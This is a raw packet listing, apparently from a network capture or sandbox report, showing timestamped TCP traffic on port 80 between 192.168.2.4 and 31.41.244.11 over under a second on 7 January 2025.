Jan 7, 2025 10:09:04.146128893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146138906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146143913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146152973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146163940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146174908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146182060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.146182060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.146209002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146219015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146229029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146229982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.146233082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146244049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146255016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146265984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.146358967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.172504902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172522068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172533035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172543049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172559977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172571898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172581911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172593117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.172631979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.172669888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.172672987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172683954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172694921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172707081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172719955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172739029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.172739029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.172794104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.172801971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172828913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.172889948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.174640894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.174653053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.174663067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.174679995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.174689054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.174699068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.174716949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.174726009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.174731016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.174731016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.174751043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.174788952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.197130919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.197144985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.197160959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.197170973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.197185040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.197195053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.197206020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.197211027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.197248936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.197273970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.229815006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.229836941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.229850054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.229885101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.229888916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.229902983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.229929924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.229940891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.229960918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.229973078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.229984045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.229994059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230036020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230036020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230063915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230073929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230083942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230094910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230106115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230117083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230143070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230149031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230149031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230156898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230195999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230195999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230200052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230212927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230225086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230262041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230273962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230284929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230295897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230317116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230317116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230369091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230428934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230439901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230449915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230460882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230470896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230477095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230483055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230495930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230520964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230520964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230556965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230576038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230592012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230606079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230623960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230633974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230643988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230648041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230648041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230655909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230664968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230668068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.230691910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.230745077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232059002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232108116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232120037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232125044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232139111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232148886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232160091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232163906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232163906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232183933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232193947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232202053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232206106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232237101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232251883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232264042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232264996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232275963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232301950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232317924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232327938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232345104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232393980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232405901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232408047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232472897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232492924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232492924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232506990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232517958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232528925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232537985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232542992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232553959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232562065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232582092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232594013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232631922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232636929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232636929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232649088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232665062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232686043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232713938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232713938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232758999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232770920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232781887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232794046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232806921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232812881 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232835054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232886076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232898951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232914925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232927084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232939005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232949018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232959986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.232992887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232992887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.232992887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233016014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233022928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233035088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233072042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233072996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233103991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233108997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233108997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233115911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233150005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233166933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233203888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233216047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233227015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233233929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233268023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233294010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233341932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233354092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233366013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233377934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233388901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233428955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233428955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.233433962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233447075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.233499050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.259255886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259268045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259279966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259295940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259306908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259325027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259335995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.259335995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.259355068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.259361982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259372950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259397030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259397984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.259408951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259449005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.259588957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259601116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259610891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259623051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259634018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.259641886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.259658098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.259686947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.261334896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.261347055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.261358023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.261368990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.261409998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.261419058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.261423111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.261431932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.261445999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.261456013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.261462927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.265206099 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.283799887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.283811092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.283821106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.283871889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.283873081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.283871889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.283886909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.283900023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.283922911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.283932924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.283956051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.283993006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316638947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316648960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316660881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316735983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316735983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316757917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316768885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316780090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316790104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316800117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316814899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316818953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316828966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316853046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316853046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316857100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316868067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316895962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316895962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316907883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316927910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316927910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316965103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.316986084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.316996098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317007065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317018032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317038059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317044973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317054987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317065001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317066908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317080975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317082882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317091942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317102909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317111969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317123890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317126036 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317126036 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317183018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317183018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317209005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317219019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317229033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317264080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317312956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317323923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317336082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317347050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317358971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317368984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317378044 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317378998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317393064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.317405939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317433119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.317478895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.318854094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.318869114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.318883896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.318892956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.318903923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.318912029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.318923950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.318928957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.318928957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.318959951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.318969965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.318969965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.318969965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.318989038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319004059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319014072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319021940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319027901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319027901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319060087 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319102049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319112062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319120884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319129944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319139957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319139957 CET	80	50017	31.41.244.11	192.168.2.4
